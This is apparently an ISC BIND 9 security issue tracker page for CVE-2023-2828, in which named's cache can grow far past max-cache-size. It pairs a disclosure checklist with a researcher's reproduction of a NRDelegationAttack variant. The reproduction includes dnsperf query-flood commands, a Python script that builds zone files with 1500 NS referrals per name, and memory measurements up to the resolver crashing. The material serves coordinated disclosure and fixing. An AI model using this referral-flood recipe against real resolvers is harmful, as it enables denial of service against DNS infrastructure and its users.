[CVE-2023-2828] named's configured cache size limit can be significantly exceeded

Quick Links	🔗
Incident Manager:	@michal
Deputy Incident Manager:	@aram
Public Disclosure Date:	2023-06-21
CVSS Score:	7.5
Security Advisory:	isc-private/printing-press!54
Mattermost Channel:	CVE-2023-2828: max-cache-size can be significantly exceeded
Support Ticket:	N/A
Release Checklist:	#4123 (closed)
Post-mortem Etherpad:	postmortem-2023-06

💡 Click here (internal resource) for general information about the security incident handling process.

Earlier Than T-5

At T-5

🔗 (Support) Send ASN to eligible customers
🔗 (Support) (BIND 9 only) Send a pre-announcement email to the <em>bind-announce</em> mailing list to alert users that the upcoming release will include security fixes

At T-4

🔗 (Support) Verify that all ASN-eligible customers have received the notification email

At T-1

🔗 (Support) Verify that any new or reinstated customers have received the notification email
🔗 (First IM) Send notifications to OS packagers

On the Day of Public Disclosure

🔗 (IM) Grant Support clearance to proceed with public release
🔗 (Support) Publish the releases (as outlined in the release checklist)
🔗 (Support) (BIND 9 only) Update vulnerability matrix in the Knowledge Base
🔗 (Support) Bump Document Version for the Security Advisory and publish it in the Knowledge Base
🔗 (First IM) Send notification emails to third parties
🔗 (First IM) Advise MITRE about the disclosed CVEs
🔗 (First IM) Merge the Security Advisory merge request
🔗 (IM) Inform original reporter (if external) that the security disclosure process is complete
🔗 (Support) Inform customers a fix has been released

After Public Disclosure

🔗 (First IM) Organize post-mortem meeting and make sure it happens
🔗 (Support) Close support tickets
🔗 (QA) Merge a regression test reproducing the bug into all affected (and still maintained) branches

Summary

This vulnerability results in high memory cache usage for a DNS resolver, even larger than the maximum cache size configured. This happens when the resolver gets around 20,000 requests in several minutes or hours. For example, with a 250 QPS rate, 1000MB RAM is used after 80 seconds when cache max size is configured to 32MB (the results example is attached to this message).

BIND version used

BIND 9.16.40 (Extended Support Version) id:113a865

Steps to reproduce

We reproduce NRDelegationAttack with some changes, for more details: https://www.usenix.org/system/files/sec23fall-prepub-309-afek.pdf

set the maximum cache size to 32MB:

in named.conf.option (attached example:named.conf.options):


options {

...

max-cache-size 32m;

...

}

Run the resolver: named -g -c /etc/named.conf
Run psrecord for testing the RAM usage of the resolver: psrecord NAMED_PID --interval 1 --plot OUTPUT_FILE.png
Option a:

Request my domain (shoham-shani.online) up to 50,000 dns queries (my authoritative ip address is 74.234.116.29):

dig shoham{count}.shoham-shani.online. @resolver_ip (count is from 0 to 49,999) (you can use dnsperf: dnsperf -d queries.txt -s resolver_ip -v -Q 250, an example to queries.txt is attached: queries.txt

You can provide us with a test resolver that you want us to attack, and we will perform the attack from our client side at the time we will agree on.

option b:

Create a zone file (example is attached) that has 1500 referrals per one request, you can use this script for that:

with open('zonfile.txt', 'w') as f:

for i in range(1, 50000):

    for j in range(0, 1500):

        print(f'shoham{i} 8600 IN    NS   attack{j}.auth{j}.shoham.store.',file=f)

shoham-shani.online_zonefile_example.txt

Create another zonefile that answers all shoham{i}.shoham.store. request: For example: * IN A 127.0.0.1 shoham.store_zonefile_example_copy.txt Request 50,000 dns queries as I described in option a.

Take a dump of the cache and examine its size: rndc dumpdb -cache
Stop the resolver service and download the OUTPUT_FILE.png image, examining RAM usage.

note: we checked the bug with 32MB, 64MB and 1GB max-cache-size and with rate of 1,5,10,13,100,250 QPS (all the results are attached)

For 1 QPS I got 440MB RAM used after 8,000 seconds for max-cache-size 32MB

For 5 QPS I got 840MB RAM used after 4,000 seconds for max-cache-size 32MB

For 10 QPS I got 840MB RAM used after 2,000 seconds for max-cache-size 32MB

For 100 QPS I got 840MB RAM used after 200 seconds for max-cache-size 32MB

For 250 QPS I got 1000MB RAM used after 80 seconds for max-cache-size 32MB

For 13 QPS I got 1550MB RAM used after 1150 seconds for max-cache-size 1000MB

What is the current bug behavior?

The cache size expands beyond the limit resulting in an increasing amount of memory being allocated. In addition, if there is no memory available on the machine, the resolver service will crash.
A free memory action is not performed for the referral list buffer, which results in an increase in memory allocation for buffers (dns_rdataslab_fromrdataset function in line 272 of the rdataslab.c file).
It seems the cache size calculation does not consider authoritative nameservers' refferal answers, although they are stored in the cache.
High and low watermarks are set incorrectly to 0, which means the resolver is unaware that the memory usage exceeds the maximum level and does not reduce it.

What is the expected correct behavior?

The cache size should be the maximum size we configured.
There should be a free memory action to the buffer (rawbuf in rdataslab.c file)
In order to calculate cache size, it is necessary to take into account referral list and perform a deletion when the cache exceeds the configured limit.

Relevant configuration files

configuration file:

named.conf.options zonefiles: shoham-shani.online_zonefile_example.txt shoham.store_zonefile_example copy.txt

Relevant logs and/or screenshots

Tests are attached

Possible fixes

Free the buffer:


free_rawbuf:

    isc_mem_put(mctx, rawbuf, buflen);

please add the following to this issue: Yehuda Afek, yehuda.afek@gmail.com /cc @afek Anat Bremler-Barr, anat.bremlerbarr@gmail.com /cc @anat_bremler_barr Yuval Shavitt, shavitt@eng.tau.ac.il

Edited Jul 26, 2023 by Nicki Křížek

To upload designs, you'll need to enable LFS and have an admin enable hashed storage. More information